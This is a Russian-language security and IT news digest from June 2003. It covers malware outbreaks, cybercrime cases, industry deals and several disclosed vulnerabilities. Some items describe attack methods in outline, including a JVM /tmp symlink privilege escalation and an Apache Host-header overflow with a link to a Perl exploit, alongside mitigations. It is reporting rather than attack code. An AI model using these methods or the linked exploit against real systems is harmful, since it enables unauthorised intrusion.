Специалисты по безопасности весьма недовольны решением журнала Wired, популярнейшего издания, посвященного киберкультуре, в июльском номере опубликовать исходный код вируса SQL Slammer, сообщает Information Week. По мнению недовольных, такая публикация есть ненужное распространение вредоносной программы, которую и без того с легкостью можно найти в сети. Публикация кода - безответственное решение, утверждают некоторые специалисты, она пропагандирует создание вирусов как таковое. Они сравнивают этот шаг с открытием в университете Калгари курса "Компьютерные вирусы и вредоносные программы", в ходе которого студентов научат писать вирусы. По мнению других экспертов, впрочем, все, кому нужен код вируса SQL Slammer, вполне способны найти его в Сети и без помощи Wired. Эпидемия SQL Slammer началась 25 января и оказалась одной из самых серьезных вирусных эпидемий в истории Интернета. Для проникновения в компьютерные системы червь использовал дыру в SQL Server производства корпорации Microsoft. Собственно червь представляет собой программу размером 367 байт. Механизм действия сводился к непрерывным атакам UDP-порта 1434 любой машины, до которой червь может дотянуться с любого зараженного компьютера. По мнению многих экспертов, SQL Slammer был написан на основе программного кода, несколькими месяцами ранее опубликованного в Интернете специалистом по безопасности Дэвидом Литчфилдом. Когда сообщения об этом появились в прессе, Литчфилд в интервью нескольким западным СМИ выразил сомнения в полезности полного раскрытия информации, касающейся компьютерной безопасности. Источник - http://www.grani.ru
14/06/2003 11:21 Первый Семинар Системных Администраторов.
Ребята с сайта, посвящённого системному администрированию (на мой взгляд, лучший в Рунете), объявили о проведении первого в России семинара Системных Администраторов, или, сокращённо, SYSM (SYSadminsMeeting). Планируется его провести 12 июля сего года с 12-00 до 20-00. Место проведения - Москва, микрорайон "Матвеевское", ул. Нежинская, 5, Дом ветеранов кино (ДМК). Семинар будет посвящен проблемам IT, тенденциям рынка IT, рынку труда с точки зрения IT специалистов и множеству смежных вопросов. Для участия в семинаре необходимо заполнить заявку, доступную на сайте. Иногородним планируется предоставление номеров. Подробности - http://sysadmins.ru/news/index.php?news=18
14/06/2003 11:09 Москва: отдел "К" против хакеров.
Согласно милицейской статистике, только за май 2003 года отделом "К" УВД края (отдел по борьбе с компьютерными преступлениями) возбуждено семь уголовных дел по факту несанкционированного доступа к компьютерной информации, охраняемой законом. Как рассказал "Н" замначальника отдела "К" Дмитрий Иванец, в данном случае речь идет о ст. 272 УК РФ (неправомерный доступ к компьютерной информации), есть еще целый ряд компьютерных статей. Еще один нюанс - за кражу информации или времени (если речь идет о карте доступа в интернет) следствие может даже возбудить уголовное дело по ст. 158 УК РФ (кража). В любом случае, уголовное дело - вещь крайне неприятная. По словам оперативников, средний возраст тех, кто занимается взломами чужих паролей, кражами времени и информации, - 16-23 года. Действуют они обычно тремя способами. Первый - получение алгоритмов по взлому (так называемых троянов) на хакерских сайтах. Второй - получение уже готовых паролей и логинов от знакомых и друзей. И третий - покупка CD с уже готовыми программами взлома. Так, в мае этого года сотрудники отдела "К" в ходе проверки одного из компьютерных магазинов изъяли диск с программой, предназначенной для взлома чужих почтовых ящиков. Сам Дмитрий Иванец говорит, что зачастую хакеры сами не ведают, что творят: украв чужого времени на 50 рублей, они потом по решению суда выплачивают ш траф до 50 тысяч рублей. Есть даже отдельный бизнес во Владивостоке: по улицам ходят парни, предлагающие всем желающим за определенную сумму бесплатный доступ в интернет едва ли не пожизненно Источник - http://www.crime-research.org
14/06/2003 10:37 В России могут запретить интернет-форумы.
Сенсационно закончилось 2 июня заседание в Федеральном арбитражном суде Московского округа по кассационной жалобе ЗАО "Тройка сталь" к ООО "Мегасофт", владельцу портала MetalTorg.ru. Поводом для подачи иска в свое время стала анонимная информация, опубликованная в разделе "Черный список" сайта MetalTorg.ru, которую активно обсуждали посетители форума этого интернет-ресурса. Владельцы "Тройка-стали" посчитали, что в форуме была опубликована "заведомо ложная информация, порочащая деловую репутацию компании". В своем иске они требуют не только опровержения якобы ложных сведений и материальной компенсации, но и приостановления работы интернет-ресурса. Стремление руководства компании к защите своей чести и достоинства понятно. Но если исходить из логики мышления "Тройка-сталь", то все форумы Рунета потенциально опасны как источник появления грязной информации. Доказательств того, что к публикации имеют отношение руководители или владельцы MetalTorg.ru, нет. Вполне логично, что Арбитражный суд Московской области первой и апелляционной инстанций не поддержал позицию истца и отказал ЗАО "Тройка-сталь" в удовлетворении иска Подробности - http://www.runet.ru/events/3186.html
14/06/2003 10:15 В Рунете открыт поисковый сервис по сайтам мобильной тематики и КПК .
По мнению специалистов, узкотематический поиск - заведомо трудный путь к успешному коммерческому проекту. Составить конкуренцию китам вроде "Яндекс.Маркет" или Прайс.ру они не в состоянии. Тем не менее, это не останавливает самых решительных. О старте нового поискового сервиса объявили mobilereseller.ru (информационный портал, посвященный ноутбукам, сотовой телефонии и КПК) и проект PDANewsCollector.ru, предоставляющий поисковый сервис по теме карманных ПК и мобильных устройств. Сервис расположен на сайте сайта mobilereseller.ru и работает на базе созданной в рамках проекта PDANewsCollector.ru подсистемы организации тематического поиска. Поисковое ядро системы предоставляет возможность полуавтоматической фильтрации отдельных тематических разделов (например, ноутбуки или КПК), а также выборочно индексировать отдельные разделы, сообщается в пресс-релизе. По условиям соглашения, результаты поиска оформлены в формате поисковой выдачи PDANewsCollector.ru, при этом, рекламные блоки клиентов PDANewsCollector.ru будут располагаться над рекламными блоками mobilereseller.ru. Источник - http://www.runet.ru
13/06/2003 20:14 Россия опасается удара из киберпространства.
Зависимость от западных производителей информпродуктов, по мнению специалистов, никогда не позволит сформировать в нашей стране надежную систему информационной безопасности. В Министерстве связи и информатизации состоялось первое заседание рабочей группы по использованию программного обеспечения в государственных учреждениях России. Проблема заключается в том, что сегодня большая доля программного обеспечения на отечественном рынке представлена западными производителями, хотя подобные продукты по понятным причинам приемлемы в первую очередь для частного сектора. Что же касается госструктур, то использование западных программ в российской армии, в органах госуправления и т.д., по мнению специалистов, не может гарантировать должного уровня безопасности. Сегодня единственный способ интегрироваться в мировое информационное пространство и не стать зависимым от западных производителей программного обеспечения (ПО) – это начать широко внедрять отечественные информационные продукты, считают специалисты. В течение ближайших трех недель рабочая группа разработает концепцию по созданию и внедрению национального ПО и представит ее через месяц на очередном заседании в Министерстве связи и информатизации. Эксперты признают, что сегодня активная интеграция России в мировое экономическое пространство невозможна без «подтягивания» до мирового же уровня объема используемых в стране информационных технологий. Однако наряду со всевозможными преимуществами, глобальная информатизация российского общества несет и массу опасностей. Потери от компьютерной преступности в России растут быстрее темпов информатизации. «В прошлом году лишь в Московском регионе зафиксировано 500 преступлений в сфере информационных технологий, – сказал RBC daily сотрудник правоохранительных органов. – Однако только за четыре месяца текущего года «компьютерных» нарушений было зарегистрировано уже более 800. Есть случаи краж денег с банковских счетов, с кредитных карточек, нередки взломы кодов и несанкционированные проникновения в информационные базы компаний и государственных структур. Хотя, конечно, в России размах компьютерных преступлений в связи с невысокой компьютеризациейгоссектора пока еще не так велик, как, например, в США и Канаде». Подробнее - http://www.crime-research.org/news/2003/06/1201.html
13/06/2003 20:01 Вирус BugBear.B атаковал компьютерные сети украинских госструктур.
Украинские центральные структуры государственной власти на прошлой неделе пострадали от нового компьютерного вируса BugBear.B, распространяющегося по всему миру. В частности, в Генпрокуратуре и Министерстве иностранных дел официально подтвердили, что их компьютерные сети подверглись атаке нового вируса. В связи с угрозой вирусной эпидемии компьютерная сеть центрального аппарата МИД Украины была отключена до конца пятницы. Аналогичные проблемы испытали и в Генпрокуратуре, где сочли нужным сообщить всем, кто поддерживает с ней электронную связь о существовании нового вируса. Вирус, присланный в Генпрокуратуру в четверг, был автоматически распространен по всем адресам, содержащимся в базе данных. Однако в настоящее время последствия вируса ликвидированы. Кроме того, ряд других центральных министерств и ведомств Украины, а также различные коммерческие предприятия пострадали от нового вируса. В то же время, вирус не поразил ведомства, имеющие серьезную защиту и разделение сетей. Источник - http://news.proext.com/
13/06/2003 19:18 Российские паспорта будут дополнены элементами биометрики.
К концу 2004 года Россия присоединится к единой системе идентификации личности, к которой должны придти страны "большой восьмерки". В российские паспорта будут внедрены элементы персональных биометрических данных. Об этом во вторник журналистам сообщил министр внутренних дел России Борис Грызлов. Как сообщает РИА "Новости" на очередной встрече министров внутренних дел стран "восьмерки" было принято решение, что до октября 2004 года "каждой из этих стран необходимо провести соответствующие исследования, которые могут привести к пониманию, каким образом улучшить наши идентификационные документы". "Сегодняшние паспорта не позволяют нам в полной мере идентифицировать личность", - подчеркнул министр. Много документов подделывается, добавил он. Грызлов отметил, что на встрече министров стран "восьмерки" "принято общее решение использовать биометрические показатели". "Это могут быть отпечатки пальцев, роговицы глаза, цифровым образом обработанная внешность человека. Принципы различные", - пояснил глава МВД РФ. Источник - http://www.rian.ru/
13/06/2003 18:34 Москва намерена обеспечивать свою информационную безопасность.
В начале недели закончилась летняя сессия всероссийской конференции «Информационная безопасность России в условиях глобального информационного общества». Постоянный рост влияния информационных технологий на процесс управления государством, обусловленный техническим прогрессом, вызывает нешуточное беспокойство у органов власти России и ее субъектов о собственной информационной безопасности. Так, московское правительство намерено уделять все большее внимание вопросам безопасности при создании прозрачной среды управления городом, и недавно было создана даже новая структура правительства Москвы в рамках Управления правительства Москвы по экономической безопасности, которое ответственно и за информационную безопасность города. Начальник Управления Александр Корсак на пленарном заседании конференции посетовал на то, что правительство города вынуждено самостоятельно разрабатывать концепцию экономической безопасности города, в рамках которой прорабатываются вопросы и информационной безопасности столицы. Также среди основных тем заседаний конференции стояли вопросы коммерческой тайны, проблемы создания благоприятных условий для отечественной экономики и предпринимательства, развития наукоемких отраслей производства и предупреждения недобросовестной конкуренции. Эти вопросы были заявлены в свете внесения правительством РФ в Госдуму закона «О коммерческой тайне» и в связи с необходимостью разработки механизма его реализации. Однако в итоге этот список был сведен к единому знаменателю несовершенства российского законодательства и проблем, связанных с применением понятий «коммерческая тайна». Более содержательным получилось заседание, посвященное проблемам и решениям информационной безопасности в Московском регионе, которое проводилось совместно с правительством Москвы и Московской области и аппаратом полпреда президента РФ в ЦФО. Генеральными спонсорами конференции стали представительства компаний Sun Microsystems, Microsoft и SAP AG. Подробнее - http://www.cnews.ru/newtop/index.shtml?2003/06/11/145203
13/06/2003 17:50 Бум электрического интернета откладывается.
Начиная с середины 90-х годов пресса активно освещает проблему выхода в интернет с помощью обыкновенных электрических сетей. Достоинства такого подхода, на первый взгляд, очевидны: электрические сети есть практически повсеместно, даже там, где плохо с телефонной связью, а для подключения к интернету достаточно наличия в доме свободной электрической розетки. На практике, однако, все обстоит не так просто, и дальше нескольких пилотных проектов в Европе и Америке дело пока не пошло. Главная причина возникновения осложнений связана с тем, что несмотря на развитую инфраструктуру электрических сетей, сама по себе она непригодна для передачи данных. На электрических подстанциях и на стороне клиентов необходимо устанавливать дополнительное оборудование, выделяющее информацию из силового сигнала. Если такого оборудования не будет, данные будут потеряны при преобразовании напряжений на трансформаторе. Из-за необходимости установки дополнительного оборудования "электрический" интернет обходится в суммы, сопоставимые со стоимостью других видов доступа. Впрочем, эксперименты с передачей сетевого трафика по линиям электропередач продолжаются. Например, компании Consolidated Edison удалось добиться скорости передачи данных порядка 4 Мбайт/с при ориентировочной стоимости доступа в 30 долларов США в месяц. Для сравнения, месяц доступа в Сеть через кабельный модем со скоростью 1,5 Мбайт/с обойдется в 42 доллара. Для подключения к сети через электрическую розетку необходимо установить два дополнительных коммуникационных устройства. Информация передается по сети на частоте, значительно большей частоты переменного тока (60 Гц), что позволяет избежать возникновения помех. Источник - http://www.compulenta.ru
13/06/2003 17:26 Microsoft добавляет во FrontPage бизнес-функции и XML.
После многолетних игр с любителями Microsoft решила выдвинуть свое ПО веб-дизайна FrontPage в серьезную лигу. Во вторник компания рассказала о деталях FrontPage 2003, следующей версии пакета, которая должна выйти этим летом вместе с другими продуктами Office System. Предыдущие версии FrontPage представляли собой маломощный инструментарий веб-редактирования для потребителей и мелких компаний с умеренным присутствием в вебе. Новая же нацелена на корпоративный мир и предлагает дополнения, рассчитанные на профессиональных веб-дизайнеров и системных администраторов. Как и другие компоненты будущего семейства ПО Office 2003, основные изменения FrontPage связаны с языком Extensible Markup Language (XML), который быстро становится стандартным способом обмена данными между разными компьютерными системами. Поддержка XML в других продуктах сосредоточена на передаче информации в базы данных и другие корпоративные back-end-системы. Во FrontPage данные перемещаются в противоположном направлении. XML-приложения, созданные при помощи этого инструмента, вытягивают нужную информацию из баз данных, постоянно обновляя содержание отображаемых страниц. Во FrontPage существенно переработан и интерфейс кодирования — чтобы дизайнеры могли легко переводить код в другие приложения и наоборот. «Раньше нам говорили, что наш код недостаточно прозрачен, что мы генерируем беспорядочный код, — пояснила Сэмюэльсон. — И мы постарались сделать так, чтобы генерируемый код стал чистым, соответствующим промышленному стандарту кода HTML». Подробнее - http://www.zdnet.ru/?ID=302162
12/06/2003 16:11 Antivirus for sendmail v.1.21.
Вышла новая версия этого замечательного патча для sendmail'а, который работает в паре с AVP Касперского, позволяет проверять все входящие и исходящие сообшения не только для SMTP, но и для приемки и отправки сообщений по UUCP, чего не позволяют делать решения на базе milter. У меня эта связка работает несколько лет и показала себя надежным решением. Есть правда одна особенность, автор данного проекта, Petr Rehor, базирует свое решение на старых версиях sendmail'а 8.10.х и 8.11.х, и похоже больше не собирается его развивать в виде патча. Cообщение взято из анонса господина McMCC на сайте linux.org.ru. Сайт автора патча и патчи для старых версий сендмейла - http://home.i.cz/reho/check_virus/ Патч автора новости - http://mcmcc.bat.ru/mypatches/check_virus-1.21-8.12.9.diff.bz2
12/06/2003 15:08 Panda Software приветствует инициативу Microsoft по усилению компьютерной безопасности.
Panda Software отнеслась с одобрением к приобретению компанией Microsoft румынского разработчика антивирусного ПО компании GeCAD. Это приобретение призвано улучшить платформу Windows и усилит поддержку независимых антивирусных вендоров. «Уже более двух лет мы работаем совместно с компанией Microsoft над совершенствованием инфраструктуры антивирусного менеджмента, и будем продолжать это делать, - говорит Микель Уризарбарррена (Mikel Urizarbarrena), президент Panda Software. – Этот шаг компании Microsoft поможет установить новые стандарты безопасности и позволит объединить усилия пользователей и разработчиков в борьбе с вирусами». Педро Бустамате (Pedro Bustamante), директор по маркетингу компании Panda Software, добавляет: «Для хакеров не существует авторитетов. По нашим прогнозам, в будущем возможно повторение атак, подобных той, что предпринял Slammer, поэтому антивирусы должны будут быть перерасти в более широкую категорию – в категорию программ, способных справиться с любым сообщением, документом или программой, способным к негативному воздействию на информационные системы. Еще в начале года мы выпустили на рынок такой продукт – Appliance. Философия превентивной защиты, которую исповедует наша компания, поможет и в будущем нашим клиентам чувствовать себя в безопасности». Источник - http://www.viruslab.ru
12/06/2003 14:56 Cтатья "История "кибертеррориста N1"
Сайт Дмитрия Леонова опять порадовал интересной статьёй из серии истории СЕТИ под названием "История "кибертеррориста N1". Статья посвящена описанию жизненного пути господина Кевина Поулсена (не путать с не менее знаменитым тёзкой по фамилии Митник). Дальше позволю себе процитировать первоисточник. Жизнь Кевина Поулсена была полна событий и интриг. Присоединившись к подпольному движению фрикеров в раннем возрасте он с годами стал легендой хакерского мира. Одни называли его "компьютерным террористом N1", другие - "телефонным злым гением", но сам Кевин никогда не стремился нести зло. Он занимался тем, что было ему интересно, что овладевало всеми его мыслями. Жажда знаний и стремление к постоянному совершенствованию - такими были его цели. Несмотря на это, Кевин Поулсен вошел в историю как хакер, который провел в заключении самый большой срок. Справедливым ли было решение суда? "Да"- говорили обвинители. "Нет"- вторил им весь мир. Автор статьи - mindw0rk. Статья - http://www.bugtraq.ru/library/underground/paulsen.html
12/06/2003 13:54 США: появился опасный "банковский вирус".
Правительство США выпустило сегодня специальное предупреждение о новом вирусе, объектами действия которого стали уже более 1 200 банков по всему миру. Новая инфекция, пущенная в сеть, – охотник за паролями корпоративных предприятий. В настоящее время расследование по этому делу ведут специалисты из ФБР. Эксперты в области компьютерной безопасности полагают, что это первая интернет-атака, направленная на отдельно взятый сектор экономики. Эксперты, изучающие коды программного обеспечения, обнаружили список из порядка 1 200 веб-адресов многих крупнейших в мире финансовых учреждений, включая JP Morgan Chase & Co, American Express Co, Wachovia Corp, Bank of America Corp и Citibank NA. Инфекция, получившее название BugBear.B, за последнюю неделю расползлась по десяткам тысяч компьютеров. Аналитический центр уже распространил информацию департамента внутренней безопасности по всем банкам США, использовав для этого сообщения тревогу повышенного уровня. Новый вирус, как уже отмечалось, пытается красть пароли и другую информацию, которая облегчает хакерам доступ во внутренние банковские сети. Источник - http://www.oxpaha.ru
12/06/2003 12:41 Москва: кого «продал» российский «крот-контрразведчик» Запорожский?
Московский окружной военный суд приступил в среду к оглашению приговора бывшему сотруднику одной из российских спецслужб полковнику Александру Запорожскому, обвиняемому в измене Родине в форме шпионажа. Вынесение вердикта проходит за закрытыми дверями. Запорожскому инкриминируется передача сведений, составляющих гостайну, представителям одной из иностранных разведок. 52-летний Запорожский до 1997 года являлся заместителем начальника первого отдела Управления внешней контрразведки Службы внешней разведки России. С 1997 года он работал в американской компании и проживал в штате Мэриленд США. Он был арестован в 2001 году в Москве. С тех пор он находится под стражей в следственном изоляторе "Лефортово". Там же с 13 марта проходят в закрытом режиме выездные заседания Московского окружного военного суда (МОВС), сообщает ИТАР-ТАСС. Запорожский обвиняется в "государственной измене" (ст. 275 УК РФ) в пользу США. По данным следственного управления ФСБ РФ, расследовавшего дело, он в течение пяти лет передавал представителям спецслужб США секретную информацию о деятельности российских разведорганов и их кадровом составе. По мнению следствия, действия полковника нанесли существенный ущерб внешней безопасности России. В связи с этим гособвинитель потребовал признать Запорожского виновным во всех инкриминируемых подсудимому деяниях и приговорить его к 16 годам лишения свободы с отбыванием в колонии строгого режима. Однако, по мнению адвоката Запорожского Марии Веселовой, "у обвинения нет прямых доказательств вины подсудимого". Источник - http://www.newsru.com
11/06/2003 15:17 уязвимость в Sun Java Virtual Machine.
Обнаружена уязвимость в JVM для ОС Linux. Локальный пользователь может получить повышенные привилегии на системе. Sun Java Virtual Machine (JVM) на Linux системах небезопасно сохраняет временные лог файлы в '/tmp' каталоге. Согласно сообщению, JVM создает '/tmp/jpsock.**_*' файл при загрузке, без предварительной проверки существования файла, и если файл существует, не проверяет кто его владелец. Локальный пользователь может сконструировать символьную ссылку из произвольного файла к временному имени файла. Затем, когда целевой пользователь запускает JVM, ссылающийся файл будет перезаписан с привилегиями целевого пользователя. Уязвимость обнаружена в j2re1.4.1_02 on Linux Способов устранения обнаруженной уязвимости не существует в настоящее время. Подробнее - http://www.securitylab.ru/?ID=38304
11/06/2003 14:14 Intel узнает секреты беспроводной технологии Java .
В понедельник конкуренты — Sun Microsystems и Intel — заключили соглашение, которое должно гарантировать лучшую совместимость их мобильных продуктов. По условиям этого соглашения Intel получит доступ к секретам популярной технологии программирования Sun Java для мобильных устройств, которую операторы сотовых сетей используют для продажи загружаемых мелодий звонка, игр и других излишеств. Затем Intel оптимизирует свои процессоры Xscale с тем, чтобы Java-приложения работали быстрее и экономичнее. «Семейство процессоров Xscale очень удачно подходит для подобных вещей», — сказал старший директор Sun Хуан Девар, добавив, что производители карманных устройств, включая Nokia и Motorola, увидят плоды соглашения уже в конце этого месяца. Источник - http://www.zdnet.ru
11/06/2003 13:10 Исследование Symantec: cпам развращает детей.
Отделение компьютерной безопасности корпорации Symantec обнародовало данные своего последнего исследования, из которого следует, что дети, пользующиеся интернетом и электронной почтой, получают спам в той же мере, что и взрослые. В числе получаемых детьми и подростками писем содержится порнографическая реклама, реклама не предназначенных для детей препаратов (например, средств для повышения потенции), а также реклама бизнеса, основанного на "пирамидальных" схемах. Опрошенные аналитиками из Symantec американские дети в большинстве случаев заявляли, что получаемая порнореклама смущает их и доставляет дискомфорт. Как полагают специалисты, письма, призывающие присоединиться к "схемам быстрого обогащения", могут ввести детей в заблуждение и вовлечь их в мошеннические операции. В то же время, в силу недостаточной компетенции многих родителей, работа детей с интернетом в семьях мало контролируется и дети почти не ограждены от негативного воздействия рекламных рассылок. Источник - http://www.lenta.ru
11/06/2003 11:55 Операторов сотовой связи обязали сохранять номера абонентов при переходе к другому провайдеру.
Каждый мобильный абонент желает, чтобы его любимый номер оставался всегда с ним, - даже в случае смены оператора. Последние же, используя привязанность клиентов, сознательно завышают тарифы. Как показывает российский опыт, кое-кто даже пытается лично судиться с оператором из-за причиняемых неудобств. В США же подобные тяжбы стали привычным делом, хотя решение по последней из них можно считать знаковым событием. Апелляционный суд округа Колумбия вынес решение по делу Verizon Wireless, Ассоциации провайдеров телекоммуникационных услуг CTIA и Федеральной комиссии по связи (FCC). Суд постановил, что с ноября текущего года все сотовые операторы будут обязаны предоставлять своим абонентам услугу сохранения номера при переходе в другую компанию. Источник - http://www.runet.ru
11/06/2003 11:48 Trustworthy Computing: Microsoft делает очередной ход.
Несколько неожиданный ход осуществила во вторник всем известная корпорация Microsoft (которая вот уже несколько месяцев служит нам надежным генератором всевозможных новостей - прим. ред.): в рамках инициативы Trustworthy Computing, нацеленной на повышение электронной безопасности продуктов Microsoft, ею была приобретена румынская компания GeCAD Software, разработчик антивирусного пакета Reliable Antivirus (RAV). По словам представителей Microsoft, приобретенные технологии будут применяться для защиты от вирусных атак тех двух третей пользователей, у которых (по данным компании) нет последних обновлений сегодня существующих антивирусных продуктов. Как именно будут использованы технологии GeCAD Software, пока не разглашается. На данный момент планируется лишь создать платный антивирусный сервис наподобие MSN. Рыночные аналитики уже успели провести параллели между покупкой GeCAD Software и пресловутой "войной браузеров": понятно, что приобретенные технологии с большой долей вероятности будут встроены в грядущую версию Windows (появятся ли они уже в Longhorn - пока неизвестно), что поставит под удар работающие сегодня на антивирусном рынке компании. Однако, по мнению Джина Ходжеса (Gene Hodges), президента Network Associates, пока еще рано строить катастрофические прогнозы. Антивирусные продукты существенно сложнее в создании и последующем обслуживании, чем интернет-браузеры. Огромную роль играет скорость реакции компании-производителя на появление новых вирусов, способных "обрушить" корпоративные сети и даже целые сегменты интернета. И пока не совсем понятно, насколько Microsoft, для которой антивирусная защита все же не является приоритетом, будет способна противостоять подобным угрозам. Источник - http://www.viruslist.com
11/06/2003 10:46 Минсвязи разберется с электронной подписью.
Министерство по связи и информатизации России в течение трех месяцев разработает регламент мероприятий по использованию электронной цифровой подписи и сертификат ее соответствия, сообщил во вторник на региональной конференции "Электронная Россия – человеку, бизнесу, обществу" первый заместитель министра РФ по связи и информатизации Андрей Коротков. По его словам, закон "Об электронной подписи", который был принят в 2002 г., применяется лишь внутри отдельных ведомств. При налаживании электронного документооборота между госструктурами и бизнесом или гражданами и государством необходимо создать систему удостоверяющих центров электронной подписи. Проект создания таких центров также планируется разработать в Минсвязи РФ. Источник - http://www.cnews.ru
10/06/2003 12:34 Эксплоит уязвимости в версиях 2.0.x Apache.
Ранее мы сообщали об уязвимости в библиотеке APR (Apache Portable Runtime). Использование этой библиотеки замечено в модулях mod_proxy и mod_dav (функции apr_psprintf()). Эксплоит не заставил себя долго ждать. Господином Мэтью Мэрфи выпущен эксплоит (правда, согласно письма автора - довольно ограниченный - дабы не давать в руки скрипт-киддей "атомную бомбу" ;)). Как пишет сам автор, даже факт того, что в модели Апача не используется модуль mod_dav, Не даёт основания полагать, то сервер не обладает уязвимостью, поскольку функция apr_psprintf() используется многими модулями для помещения имени хоста в буфер. Используя длинный заголовок "Host" в запросе HTTP/1.1 можно использовать уязвимость этой библиотеки. В качестве временной меры защиты можно применять следующие строки в конфигурационном файле Apache: LimitRequestFields 15 LimitRequestFieldSize 800 Эксплоит написан на Perl. Эксплоит - http://www.techie.hopto.org/exploits/Apache-Knacker.pl
10/06/2003 10:53 Уязвимость во многих броузерах?
На днях появилось довольно спорное сообщение от некоей лаборатории meme156, в котором сообщается о существовании уязвимости во многих современных броузерах. В качестве уязвимых приводятся Opera, Mozilla & Netscape. Как ни странно, IE подобной уязвимости не повержен. Примечательно то, что суть уязвимости (как пишёт авторы) основана на уязвимости, описанной ещё в 1997 г. первыми исследователями модели безопасности Java Ben Mesander,Dan Brumleve и Georgi Guninski. Эта уязвимость, ввиду ошибок в реализации Джавы позволяла заружать произвольныее классы, рисунки в броузер IE. В самом письме приведён пример Джава скрипта, который при помощи функции "view-source:" позволяет запустить произвольный сценарий. Попытки пробиться на страницу якобы "живой" демонстрации эксплоита ни к чему не привели. Так что вынуждены оставить проврку уязвимости на откуп нашим посетителям. В качестве меры противодействия авторы предлагают отключить Java. Честно говоря, не до конца понятно - в чём, собственно, присутствует уязвимость - то ли в самом броузере, то ли в конкретной реализации Джава-движка. Также озадачивает в подобной ситуации реакция от "столпов" безопасности броузеров - того же Гунинского, например. Подробности - http://archives.neohapsis.com/archives/bugtraq/2003-06/0065.html
10/06/2003 09:39 Дыра в Hotmail привлекает спамеров.
Энтузиасты обнаружили новую дыру в защите принадлежащей Microsoft почтовой службы Hotmail. В последних версиях ПО, управляющего работой Hotmail, реализована более тесная интеграция с почтовым клиентом Outlook Express. Для передачи почты на сервер в этом случае используется протокол WebDAV. Именно в нем и содержится уязвимость, позволяющая безнаказанно осуществлять массовые рассылки. Дыра была обнаружена еще в мае, и авторы спамерских программ давно научились ее использовать. В результате, лишь малая толика спама с обратным адресом на Hotmail отправляется с помощью веб-интерфейса. Гораздо быстрее и проще рассылать мусорную почту с помощью дыры в WebDAV. Новость получена с compulenta.ru. Подробнее - http://www.unicom.com/chrome/a/000262.html
10/06/2003 09:23 В Питтсбурге прошла хакерская конференция SummerCon.
С 6 по 8 июня в Питтсбурге (штат Пенсильвания) прошла ежегодная хакерская конференция SummerCon 2003. Это одно из старейших мероприятий такого рода, которое проводится с 1985 года. В нынешнем году конференцию посетили около 200 человек из разных стран. Одной из главных задач организаторов было показать, что не все хакеры являются преступниками, и многие из них, скорее, приносят пользу, чем вредят. По словам одного из организаторов нынешней конференции Луиса Трампбура, слово "хакер" сейчас имеет резко негативный оттенок, что несправедливо. Мнение Трампбура поддерживают и представители спецслужб. Например, агент Том Грассо, отвечающий за околокомпьютерные вопросы в питтсбургском управлении ФБР отметил, что хакеры - это далеко не всегда преступники или хулиганы. Иногда их деятельность может оказаться и полезной. Подробности - http://www.summercon.org/content.agent?page_name=home
10/06/2003 09:06 Выход FreeBSD 5.1-RELEASE.
Как и было обещано ранее, 9 июня было объявлено об официальном выходе новой версии операционной системы FreeBSD 5.1-RELEASE. Об этом известил BSD-сообщество Скотт Лонг от имени команды разработчиков FreeBSD. Из улучшений/дополнений: улучшена поддержка многопоточности приложениями; улучшение поддержки Pentium Pro и выше в части поддержки RAM объёмом до 64 ГБ; экспериментальная поддержка переключателя сервиса имён с интегрированной поддержкой сервисов LDAP и Active Directory; расширенное управление "jail" (выполнение сервисов в chroot-среде), позволяющее поддерживать многие "виртуальные сервера" на одном физическом сервере; расширенный набор драйверов с включением поддержки контроллеров IBM/Adaptec ServeRAID, расширенная поддержка USB 2.0 и USB Ethernet-адаптеров, а также контролееров Serial ATA; экспериментальная поддержка архитектура amd64, дающая возможность установки FreeBSD на одном AMD Optegon-процессоре. Новый релиз поддерживает архитектуры: i386, pc98, alpha, sparc64 и ia64. О новости нашей команде сообщил VaAS. Подробности - http://www.freebsd.org/releases/5.1R/announce.html
9/06/2003 16:52 Утечка информации в некоторых сетевых драйверах Windows 2003.
Известная английская компания NGSSoftware, специализирующаяся на сеитевой и компьютерной безопасности опубликовала результаты исследования поведения некоторых драйверов сетевых карт, входящих в состав Windows Server 2003 и подписанных Microsoft. Как пишут сами авторы, на исследование их натолкнула старая уязвимость, обнаруженная @Stake, которая заключалась в том, что на основе анализа ICMP-ответов можно было получить важную системную информацию, ввиду некорректного заполнения пакетов сетевым стеком операционных систем. NGSSoftware было обнаружено, что подобная ситуцаия наблюдается у драйверов Win 2003, но уже при обменен TCP-пакетами с установленными флагами FIN-ACK,которые выставляются при корректном закрытии сетевого канала обмена данными. При этом в пакетах, поступающих со стороны сервера под управлением Win 2003 содержалась важная системная информация (в том числе и POP3-пароли). Подобная особенность была отмечена в драйверах для сетевых карт: VIA Rhine II Compatible (интегрирована в некоторых материнках), AMD PCNet семейство. Подробности - http://www.nextgenss.com/advisories/etherleak-2003.txt
9/06/2003 15:03 Мошенники подделали восемь тысяч кредиток.
В ходе совместной операции следственного комитета (СК) при МВД, ГУБОПе и ФСБ была обезврежена группировка кардеров, которая наладила выпуск поддельных пластиковых карт Visa, Master Card и American Exspress. У мошенников изъяли более 8 тыс. подделок, с помощью которых можно было похитить $30 млн. Расследование этого дела началось в феврале 2003 года, когда в ГУБОП обратились руководители ЗАО "Объединенные кредитные карточки". Предприниматели рассказали, что в супермаркетах и бутиках Москвы в последнее время стали выявлять большое количество поддельных пластиковых карт. Буквально накануне, 29 января, кассир магазина по продаже электротехники изъял у одного покупателя подозрительную карточку Visa Electron, но задержать его не удалось. Как только к покупателю направился охранник, тот выбежал на улицу и скрылся. В СК при МВД России возбудили уголовное дело по ст. 187 УК РФ ("изготовление или сбыт поддельных кредитных либо расчетных карт и иных платежных документов"). Также была создана оперативно-следственная группа с участием работников СК, ГУБОП и ФСБ России. Чекисты, кстати, уже имели информацию о подделках и теперь вместе с оперативниками и следователями приняли активное участие в обезвреживании преступников. В ходе дальнейших оперативных мероприятий было установлено, что карточки изготовляли на одной из частных квартир в Северном округе столицы. Несколько дней назад была проведена операция по задержанию злоумышленников, в которой участвовало 83 сотрудника МВД и ФСБ. Оперативники так быстро проникли в квартиру, что находившиеся в ней мошенники даже не успели отключить компьютеры, с помощью которых считывали банковскую информацию. Всего их было восемь: пять юношей и три девушки в возрасте от 22 до 28 лет. Подробнее - http://www.cnews.ru/newsline/index.shtml?2003/06/09/145064
9/06/2003 14:53 Fortress SMS - для любителей шифроваться.
